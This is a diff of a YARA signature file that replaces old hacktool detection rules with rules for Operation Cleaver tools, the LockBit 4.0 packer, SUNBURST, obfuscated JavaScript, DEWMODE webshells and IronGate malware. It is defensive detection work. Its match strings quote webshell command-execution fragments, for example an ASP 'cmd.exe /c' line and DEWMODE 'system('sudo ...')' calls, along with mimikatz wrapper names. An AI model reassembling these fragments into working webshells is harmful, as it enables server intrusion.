-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Restore=1" fullword ascii
-		$s6 = "Thread=" ascii
-		$s7 = "Running=1" fullword ascii
-		$s8 = "CheckCombination=" fullword ascii
-		$s10 = "AutoSave=1.000000" fullword ascii
-		$s12 = "TryConnect=" ascii
-		$s13 = "Tray=" ascii
+		$s1 = "mimikatzWrapper"
+		$s2 = "get_mimikatz"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Hunt
+rule SIGNATURE_BASE_OPCLEAVER_Pvz_In
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d9d1f99-2f12-51e9-a554-b349e19d00fb"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1515-L1534"
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "dede12b3-f1dd-58ba-a860-829b2331b740"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L222-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
-		logic_hash = "66d22c4dc2864d61bd485d6840887905f020fce8e19bb976ec09acaa6ed0387c"
-		score = 60
-		quality = 83
+		logic_hash = "eae778162be5dcfa0005bb237c5209e7103db3549e06706744f9ebdf04e192df"
+		score = 70
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
-		$s3 = "Usage - hunt \\\\servername" fullword ascii
-		$s4 = ".share = %S - %S" fullword wide
-		$s5 = "SMB share enumerator and admin finder " fullword ascii
-		$s7 = "Hunt only runs on Windows NT..." fullword ascii
-		$s8 = "User = %S" fullword ascii
-		$s9 = "Admin is %s\\%s" fullword ascii
+		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
+		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Listip
+rule SIGNATURE_BASE_OPCLEAVER_Pvz_Out
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file listip.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "417faf20-ee07-5c3e-bfcf-89599e38e62e"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1536-L1554"
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "46b51bff-dfd9-5f56-897c-422112bc837b"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L238-L252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
-		logic_hash = "db5cc21e8c76fdd10953ba0f06c4a1ad319ee522d9def7777dad66612b51edfc"
-		score = 60
+		logic_hash = "849300c32d2df42a011386903495d271810fd8a40c76d1a0c6295c059deb3a05"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
-		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
-		$s4 = "Local Host Name: %s" fullword ascii
-		$s5 = "Packed by exe32pack 1.38" fullword ascii
-		$s7 = "Local Computer Name: %s" fullword ascii
-		$s8 = "Local IP Adress: %s" fullword ascii
+		$s1 = "Network Connectivity Module" wide
+		$s2 = "OSPPSVC" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Arttrayhookdll
+rule SIGNATURE_BASE_OPCLEAVER_Wndtest
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "324561fc-024c-5583-aa25-6b13e9616898"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1556-L1570"
+		description = "Backdoor used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "f8daa0a8-f0f0-5bf7-b9ab-eaf5335ff2b9"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L254-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
-		logic_hash = "e43cefdb11df870f4732e74782ecefb94c0a4850c4aa994e4fbc940f523d2434"
-		score = 60
+		logic_hash = "3b29c2b92b816bd0559695cb6b0b6e050ca8c5e256ec92448535fe9edf20757f"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ArtTrayHookDll.dll" fullword ascii
-		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
+		$s1 = "[Alt]" wide
+		$s2 = "<< %s >>:" wide
+		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Eee
+rule SIGNATURE_BASE_OPCLEAVER_Zhcat
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file eee.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9d3ad3a9-0498-5ca3-ac19-f250cb10c4d3"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1572-L1591"
+		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "e1f1bc48-b895-5e23-8ffd-b6ea9c8eb26f"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L271-L285"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
-		logic_hash = "b12c11f46125a33a2d7d9d02f25762c07b9d5088f70887c000b29e82a7921399"
-		score = 60
-		quality = 60
+		logic_hash = "ef5112532ba62cb2cf6a1c62b344d9146c5b8e2da50990c8cfd60d91b99bcb5e"
+		score = 70
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "szj1230@yesky.com" fullword wide
-		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
-		$s4 = "MailTo:szj1230@yesky.com" fullword wide
-		$s5 = "Command1_Click" fullword ascii
-		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
-		$s11 = "vb5chs.dll" fullword ascii
-		$s12 = "MSVBVM50.DLL" fullword ascii
+		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
+		$s2 = "ABC ( A Big Company )" wide fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Asp4
+rule SIGNATURE_BASE_OPCLEAVER_Zhlookup
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7718aa71-fc0f-505c-a035-b78ae0438653"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1593-L1613"
+		description = "Hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "45ef9a90-db4c-59c3-b694-da3f539b118b"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L287-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
-		logic_hash = "dab19a2b92bbfe17cb860981d7bd5c3f3dd1a9e7c2ac5093fc4117f9205c1c27"
-		score = 60
+		logic_hash = "9cc476e016708fd1604a63e2391057dc9dd0865448b62742ec596d6de54bf8f6"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "system.dll" fullword ascii
-		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
-		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
-		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
-		$s5 = "atype=request(\"atype\") " fullword ascii
-		$s7 = "AceiveX dll" fullword ascii
-		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
-		$s10 = "sys.reboot(atype)" fullword ascii
+		$s1 = "zhLookUp.Properties"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Aspfile1
+rule SIGNATURE_BASE_OPCLEAVER_Zhmimikatz
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b66dec0-22c8-5937-a0b2-22cbc68241ef"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1615-L1633"
+		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "fba8ab6e-3b61-53a1-b4df-178442e3cf24"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L302-L316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
-		logic_hash = "4968e44f807f8ffface65e21fd8684ccfaee281b4da10f5110482c3f26ccac26"
-		score = 60
+		logic_hash = "1d6ce5b3351d4b01abe0c2f614d002d4e96599b4bfa01138704a3fdf345d0786"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
-		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
-		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
-		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
-		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
-		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+		$s1 = "MimikatzRunner"
+		$s2 = "zhmimikatz"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Editserver
+rule SIGNATURE_BASE_OPCLEAVER_Parviz_Developer
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
+		description = "Parviz developer known from Operation Cleaver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "de6bf995-1c7c-561f-98df-e8748d5fb157"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1635-L1657"
+		id = "2bfa90a0-0495-5b21-98f7-5ed7ebc74b2d"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L318-L332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
-		logic_hash = "6a8f6fcf8f4a0ea5ac114150d7becbd716be0bb40cd45fd5c76a4a8a328e5e40"
-		score = 60
+		logic_hash = "6ae043ee5baa7361def79811350317baf54eb76cf15001a7785808dc7947fddc"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%s Server.exe" fullword ascii
-		$s1 = "Service Port: %s" fullword ascii
-		$s2 = "The Port Must Been >0 & <65535" fullword ascii
-		$s8 = "3--Set Server Port" fullword ascii
-		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
-		$s13 = "Service Name: %s" fullword ascii
-		$s14 = "Server Password: %s" fullword ascii
-		$s17 = "Inject Process Name: %s" fullword ascii
-		$x1 = "WinEggDrop Shell Congirator" fullword ascii
+		$s1 = "Users\\parviz\\documents\\" nocase
 
 	condition:
-		5 of ( $s* ) or $x1
+		$s1
 }
-rule SIGNATURE_BASE_Sig_238_Letmein
+rule SIGNATURE_BASE_OPCLEAVER_Ccproxy_Config
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
+		description = "CCProxy config known from Operation Cleaver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5dba055f-1928-534a-8d0e-11dda56d93b7"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1659-L1675"
+		id = "c4d80a2a-2a32-585e-bc20-1c5118e4ee48"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cleaver.yar#L334-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
-		logic_hash = "6cf454d11bc806b3a30c52b730994adb8d92613c92849162717f415e5681e417"
-		score = 60
+		logic_hash = "6e5c1c75a499434ad6ddd2439d28ac91d500b18418e693761d0b236bf6d6ce42"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
-		$s6 = "Error get users from server!" fullword ascii
-		$s7 = "get in nt by name and null" fullword ascii
-		$s16 = "get something from nt, hold by killusa." fullword ascii
+		$s1 = "UserName=User-001" fullword ascii
+		$s2 = "Web=1" fullword ascii
+		$s3 = "Mail=1" fullword ascii
+		$s4 = "FTP=0" fullword ascii
+		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
 
 	condition:
-		all of them
+		all of ( $s* ) or $x1
 }
-rule SIGNATURE_BASE_Sig_238_Token
+rule SIGNATURE_BASE_Mal_Lockbit4_Packed_Feb24 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file token.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9d0ac24b-2078-5455-8d9e-a642c71f7b2d"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1677-L1694"
+		description = "Detect the packer used by Lockbit4.0"
+		author = "0x0d4y"
+		id = "3c2b2806-9dce-4dce-a7ca-89ebc9005695"
+		date = "2024-02-16"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit4_packed_win_feb24.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
-		logic_hash = "88d7086a48c6a2e3801db75565184b087e663e80e2364765072fc37a5549b8b5"
-		score = 60
+		hash = "15796971d60f9d71ad162060f0f76a02"
+		logic_hash = "07281fd86efbb7167ba1cc0c6f6897418751df1a3697869e51f806c26641e365"
+		score = 100
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.lockbit"
 
 	strings:
-		$s0 = "Logon.exe" fullword ascii
-		$s1 = "Domain And User:" fullword ascii
-		$s2 = "PID=Get Addr$(): One" fullword ascii
-		$s3 = "Process " fullword ascii
-		$s4 = "psapi.dllK" fullword ascii
+		$unpacking_loop_64b = { 8b 1e 48 83 ee fc 11 db 8a 16 72 e5 8d 41 01 41 ff d3 11 c0 01 db 75 0a }
+		$jump_to_unpacked_code_64b = { 48 8b 2d 16 0f ?? ?? 48 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 49 89 e1 41 b8 04 ?? ?? ?? 53 5a 90 57 59 90 48 83 ec ?? ff d5 48 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 4c 8d 4c 24 ?? 4d 8b 01 53 90 5a 90 57 59 ff d5 48 83 c4 ?? 5d 5f 5e 5b 48 8d 44 24 ?? 6a ?? 48 39 c4 75 f9 48 83 ec ?? e9 }
+		$unpacking_loop_32b = { 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 9C 29 C0 40 9D 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 73 }
+		$jump_to_unpacked_code_32b = { 8b ae ?? ?? ?? ?? 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 54 6a 04 53 57 ff d5 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 ff d5 58 8d 9e 00 f0 ?? ?? 8d bb ?? ?? ?? ?? 57 31 c0 aa 59 49 50 6a 01 53 ff d1 61 8d 44 24 ?? 6a ?? 39 c4 75 fa 83 ec ?? e9 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $jump_to_unpacked_code_* ) and 1 of ( $unpacking_loop_* )
 }
-rule SIGNATURE_BASE_Sig_238_TELNET
+rule SIGNATURE_BASE_APT_Fnv1A_Plus_Extra_XOR_In_MSIL_Experimental : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fae22e0f-2f69-5dc6-984c-2c07530ad11a"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1696-L1712"
+		description = "This rule detects the specific MSIL implementation of fnv1a of the SUNBURST backdoor (standard fnv1a + one final XOR before RET) independent of the XOR-string. (fnv64a_offset and fnv64a_prime are standard constants in the fnv1a hashing algorithm.)"
+		author = "Arnim Rupp"
+		id = "5505f7ff-eca5-5274-bdd1-dbbd648c3ccc"
+		date = "2020-12-22"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_backdoor_sunburst_fnv1a_experimental.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
-		logic_hash = "4e90d95b7c94933ed5c50f060840291540fc99de0173298b97d2c6ccbf75d26a"
-		score = 60
+		logic_hash = "6db212b21fec8d2c1b4cff9e32bdc027835ed660e7552b49f4418e7d0b35ca11"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
+		hash2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
+		hash3 = "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134"
 
 	strings:
-		$s0 = "TELNET [host [port]]" fullword wide
-		$s2 = "TELNET.EXE" fullword wide
-		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
-		$s14 = "Software\\Microsoft\\Telnet" fullword wide
+		$fnv64a_offset = { 25 23 22 84 e4 9c f2 cb }
+		$fnv64a_prime_plus_gap_plus_xor_ret = { B3 01 00 00 00 01 [8-40] 61 2A 00 00 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Snifferport
+rule SIGNATURE_BASE_SUSP_Obfuscated_JS_Obfuscatorio : HIGHVOL FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b903344-18d2-5d3d-be66-7260a5f3ea4b"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1714-L1731"
+		description = "Detects JS obfuscation done by the js obfuscator (often malicious)"
+		author = "@imp0rtp3"
+		id = "d808f96c-21c9-59c7-b3c7-f118d39d564e"
+		date = "2021-08-25"
+		modified = "2023-12-05"
+		reference = "https://obfuscator.io"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_js_obfuscatorio.yar#L1-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d14133b5eaced9b7039048d0767c544419473144"
-		logic_hash = "361f1a55ed4bd5a7a5d01d346c4efd1b83e701363484282235b5aab18d3abe1a"
-		score = 60
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "813df8459e4a53a084dc1f902713af74747a0c2f4ef535e682de38acba9b0e5e"
+		score = 50
+		quality = 60
+		tags = "HIGHVOL, FILE"
 
 	strings:
-		$s0 = "iphlpapi.DLL" fullword ascii
-		$s5 = "ystem\\CurrentCorolSet\\" ascii
-		$s11 = "Port.TX" fullword ascii
-		$s12 = "32Next" fullword ascii
-		$s13 = "V1.2 B" fullword ascii
+		$a1 = "var a0_0x"
+		$c1 = "))),function(){try{var _0x"
+		$c2 = "=Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(\\x20)'+');');"
+		$c3 = "['atob']=function("
+		$c4 = ")['replace'](/=+$/,'');var"
+		$c5 = "return!![]"
+		$c6 = "'{}.constructor(\\x22return\\\x20this\\x22)(\\x20)'"
+		$c7 = "{}.constructor(\x22return\x20this\x22)(\x20)" base64
+		$c8 = "while(!![])"
+		$c9 = "while (!![])"
+		$d1 = /(parseInt\(_0x([a-f0-9]{2}){2,4}\(0x[a-f0-9]{1,5}\)\)\/0x[a-f0-9]{1,2}\)?(\+|\*\()\-?){6}/
 
 	condition:
-		all of them
+		$a1 at 0 or ( filesize < 1000000 and ( 3 of ( $c* ) or $d1 ) )
 }
-rule SIGNATURE_BASE_Sig_238_Webget
+rule SIGNATURE_BASE_WEBSHELL_APT_PHP_DEWMODE_UNC2546_Feb21_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file webget.exe"
+		description = "Detects DEWMODE webshells"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b03a2463-94fe-5050-8e3d-269101a03cda"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1733-L1749"
+		id = "ea883f25-0e9b-5617-b05e-191a4a5c5a52"
+		date = "2021-02-22"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2546_dewmode.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
-		logic_hash = "958c465caddf6436b29042f1f1772e039d011d23ff13d91818a9d7ad21a2c750"
-		score = 60
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "86ce185f6350eb7485bce5bd31d91085fed25aa8ce78813e1c3c3dffbaae58ff"
+		score = 75
+		quality = 60
+		tags = "FILE"
+		hash1 = "2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7"
+		hash2 = "5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b"
 
 	strings:
-		$s0 = "Packed by exe32pack" ascii
-		$s1 = "GET A HTTP/1.0" fullword ascii
-		$s2 = " error " fullword ascii
-		$s13 = "Downloa" ascii
+		$x1 = "<font size=4>Cleanup Shell</font></a>';" ascii fullword
+		$x2 = "$(sh /tmp/.scr)"
+		$x3 = "@system('sudo /usr/local/bin/admin.pl --mount_cifs=" ascii
+		$s1 = "target=\\\"_blank\\\">Download</a></td>\";" ascii
+		$s2 = ",PASSWORD 1>/dev/null 2>/dev/null');" ascii
+		$s3 = ",base64_decode('" ascii
+		$s4 = "include \"remote.inc\";" ascii
+		$s5 = "@system('sudo /usr/local" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x3f3c and filesize < 9KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Xyzcmd
+rule SIGNATURE_BASE_Irongate_APT_Step7Prosim_Gen : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
+		description = "Detects IronGate APT Malware - Step7ProSim DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3d70b93-1d53-5403-bd22-d1e4bad5042b"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1751-L1767"
+		id = "a73cf9e2-c24f-5553-92e2-3a1a882a4a06"
+		date = "2016-06-04"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/Mr6M2J"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irongate.yar#L10-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
